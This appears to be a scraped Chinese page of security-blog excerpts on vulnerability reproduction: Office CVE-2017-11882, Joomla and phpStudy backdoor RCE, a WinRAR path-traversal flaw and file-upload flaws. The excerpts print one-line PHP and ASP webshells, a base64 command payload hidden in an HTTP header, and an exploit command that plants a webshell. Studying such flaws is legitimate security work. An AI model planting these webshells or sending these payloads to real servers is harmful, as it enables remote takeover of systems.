漏洞

[漏洞复现] CVE-2017-11882 通杀所有office版本-[转载]

喜欢而已 提交于 2019-12-01 07:26:48
原文链接:http://blog.51cto.com/chenxinjie/2092755 1、漏洞概述 这几个月来,针对微软Office套件最火热最流行的***手段,莫过于基于CVE-2017-11882的漏洞利用。 2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC***代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到2018年。 为什么这个漏洞会引起这么大的关注度呢? 从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个***环境的构建非常简单,姿势又非常“优雅”。例如,有些***效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。在后续实验过程中,大家可以自行体会。 更重要的是,这枚“通杀型”的Office高危漏洞,其实已经潜伏了17年之久,直到近几个月才被发现并低调修复…… 那么,这个漏洞是怎么回事呢?简单来说: 此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,***者通过构造特殊的字符,可以实现任意代码执行。 举个例子,如果***利用这个漏洞

应用安全 - PHPCMS - Joomla漏洞汇总

偶尔善良 提交于 2019-12-01 05:40:51
Joomla 反序列化(版本低于3.4.5) CVE-2015-8562 RCE October, 2019Refer:https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41https://blog.hacktivesecurity.com https://www.exploit-db.com/exploits/47465 https://nvd.nist.gov/vuln/detail/CVE-2015-8562 https://blog.ripstech.com/2018/woocommerce-php-object-injection/ https://www.php.net/manual/en/ref.session.php https://www.hacktivesecurity.com 来源: https://www.cnblogs.com/AtesetEnginner/p/11660803.html

集训第六天:文件上传漏洞

我怕爱的太早我们不能终老 提交于 2019-12-01 05:08:29
韩舒学姐(相当温柔)今天给我们讲解了文件上传漏洞,以及Anrwsord和Cknife等工具的使用。 文件上传漏洞 上传的文件不进行限制,有可能会被利用于上传可执行文件、脚本到服务器上,并且通过脚本文件可以获得执行服务器端命令的能力 木马 根据语言分类,有PHP、ASP、JSP、ASP.NET等不同语言下的木马;根据作用分类,有大马和小马 PHP一句话木马: <?php ehco shell_exec($_GET[‘a’]); ?> <?php ehco shell_exec($_POST[‘a’]); ?> <?php @eval($_POST[‘a’]); ?> ASP一句话木马: <%eval request(“Cknife”)%> ASP.NET一句话木马: <%@ Page Language=”Jscript”%><%eval(Request.Item[“Cknife”],”unsafe”);%> shell_exec() 通过环境执行命令,并且将完整的输出以字符串的方式返回 eval() 把字符串作为PHP代码执行执行a接收到的内容 Cknife(菜刀) 超级强大的网站管理工,分为客户端和代码两部分 只要将那简短的一句话代码放到网站上去就可以取得网站的权限 运行环境:安装了JRE1.7+环境的所有操作系统 主要功能:文件管理、虚拟终端、数据库管理 DVWA’s File

WinRAR代码执行漏洞复现

爷,独闯天下 提交于 2019-12-01 05:06:37
漏洞介绍 WinRAR 是一款流行的解压缩工具,据其官网上发布的数据,全球有超过5亿的用户在使用 2019年2月20日,安全厂商 checkpoint 发布了名为《Extracting a 19 Year old code Execution from WinRAR》的文章,文章披露了一个存在于 winRAR 中用于 ace 文件解析的 DLL 模块中的绝对路径穿越漏洞,可导致远程代码执行。 漏洞类型:代码执行 漏洞利用条件:将压缩包解压到当前文件夹,同时释放恶意文件到指定目录,重启机器便会触发漏洞(解压到自启动目录 or 解压dll文件进行劫持) 受影响版本:WinRAR 5.7 之前含有UNACEV2.dll模块的压缩程序 产生原因:ace处理相关的DLL在对解压目标的相对路径进行解析时,CleanPath函数过滤不严导致 修复方案:升级到winrar5.7.1、 漏洞复现 环境准备: 吾爱破解上找的winrar 5.60版本 靶机:192.168.41.129 简体中文64位:http://www.win-rar.com/fileadmin/winrar-versions/sc20180711/wrr/winrar-x64-560sc.exe 简体中文32位:http://www.win-rar.com/fileadmin/winrar-versions/sc20180711

集训第六天:文件上传漏洞

China☆狼群 提交于 2019-12-01 05:05:56
韩舒学姐(相当温柔)今天给我们讲解了文件上传漏洞,以及Anrwsord和Cknife等工具的使用。 文件上传漏洞 上传的文件不进行限制,有可能会被利用于上传可执行文件、脚本到服务器上,并且通过脚本文件可以获得执行服务器端命令的能力 木马 根据语言分类,有PHP、ASP、JSP、ASP.NET等不同语言下的木马;根据作用分类,有大马和小马 PHP一句话木马: <?php ehco shell_exec($_GET[‘a’]); ?> <?php ehco shell_exec($_POST[‘a’]); ?> <?php @eval($_POST[‘a’]); ?> ASP一句话木马: <%eval request(“Cknife”)%> ASP.NET一句话木马: <%@ Page Language=”Jscript”%><%eval(Request.Item[“Cknife”],”unsafe”);%> shell_exec() 通过环境执行命令,并且将完整的输出以字符串的方式返回 eval() 把字符串作为PHP代码执行执行a接收到的内容 Cknife(菜刀) 超级强大的网站管理工,分为客户端和代码两部分 只要将那简短的一句话代码放到网站上去就可以取得网站的权限 运行环境:安装了JRE1.7+环境的所有操作系统 主要功能:文件管理、虚拟终端、数据库管理 DVWA’s File

phpstudy后门漏洞复现php5.2

与世无争的帅哥 提交于 2019-12-01 01:58:23
前段时间phpstudy被人发现某些版本存在后门,许多人就这样被当作肉鸡长达两年之久 后门隐藏在程序自带的php的php_xmlrpc.dll模块 影响的版本:phpstudy2016和2018 在H:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找到php_xmlrpc.dll 用notepad++打开,ctrl+f搜索eval 说明这个版本的phpstudy是由后门的 用firefox访问本地ip,用bp抓包,用ctrl+r送到repeater 找到accept-encoding,把逗号后面的空格删掉,deflate后面回车换行,加上accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=,然后go (这是system(‘ipconfig’) ;的base64加密) 漏洞复现成功 加system(‘path’) ;(分号前面有空格) 安全问题不容小觑啊 来源: https://www.cnblogs.com/0daybug/p/11647091.html

phpStudy后门漏洞利用复现

妖精的绣舞 提交于 2019-12-01 01:57:10
phpStudy后门漏洞利用复现 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 正是这样一款公益性软件,2018年12月4日,西湖区公安分局网警大队接报案称,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据 回传大量敏感信 二、漏洞影响版本 phpStudy2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018 PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll 三、漏洞复现 1、复现环境win7+phpStudy 2016(php-5.4.45+Apache)    2、检查是否引用了php_xmlrpc.dll文件(只要引用了该文件,恶意代码就可以触发) 2.1通过phpinfo下查看    2.2通过php.ini配置文件查看    3

[CMS]Joomla 3.4.6-RCE漏洞复现

六月ゝ 毕业季﹏ 提交于 2019-11-30 21:55:10
0x00:简介 1、Joomla是一套全球有名的CMS系统。 2、Joomla基于PHP语言加上MySQL数据库所开发出来的WEB软件系统,目前最新版本是3.9.12。 3、Joomla可以在多种不同的平台上部署并且运行。 0x01 环境配置 RCE: https://github.com/momika233/Joomla-3.4.6-RCE 环境下载: https://downloads.joomla.org/it/cms/joomla3/3-4-6 0x02 漏洞复现 2.1 漏洞位置 http://x.x.x.x/configuration.php 影响范围:3.0.0-3.4.6 2.2 漏洞验证 python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4 显示“Vulnerable”证明存在漏洞 2.3 漏洞利用 执行成功 并在“configuration.php”写入随机密码的一句话木马 上图的密码为:kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi 2.4 蚁剑链接测试 0x03 漏洞预防 1、部署安全狗对于网站目录文件的查杀 2、更新至最新版本3.9.12 0x04 参考链接 http://0x11.com.cn/index.php/archives/37/ 来源:

DAY14:命令执行

南楼画角 提交于 2019-11-30 21:30:35
一、什么是命令执行 1. 命令执行 2. 命令执行漏洞 3. 命令执行漏洞产生的条件 4. 命令执行常用函数 二、命令执行漏洞利用 1. 权限问题 命令注入漏洞的危害跟web中间件(apache、nginx等)运行的权限有关,由于web应用运行在web中间件上,所以web应用会“继承”web中间件的运行权限,如果存在命令注入漏洞的web应用运行在以系统管理员身份运行的web中间件上,那么通过web执行命令就相当于以管理员权限执行命令。 2. 常用系统命令与功能 command命令就可以是echo一个webshell到指定文件 ① Windows下同时执行多条命令语法格式 一根管道符其实两个命令都要执行 ② Linux下同时执行多条命令语法格式 三、反序列化命令执行 (能够利用exp顺利利用漏洞,明白什么是反序列化漏洞、原理) 1. PHP序列化 ① 什么是序列化? php允许保存一个对象方便以后重用,这个过程被称为序列化 ②序列化代码示例如下: 2. PHP反序列化 ①反序列化代码示例如下: ② 构造函数(当执行对应操作时自动调用) ③构造函数示例代码如下: 3. * 什么是反序列化漏洞? 4. PHP反序列化漏洞示例 *原理:当传给unserialize()的 参数可控 时,我们可以通过传入一个精心构造的序列化字符串,从而控制对象内部的变量甚至是函数 来源: https:/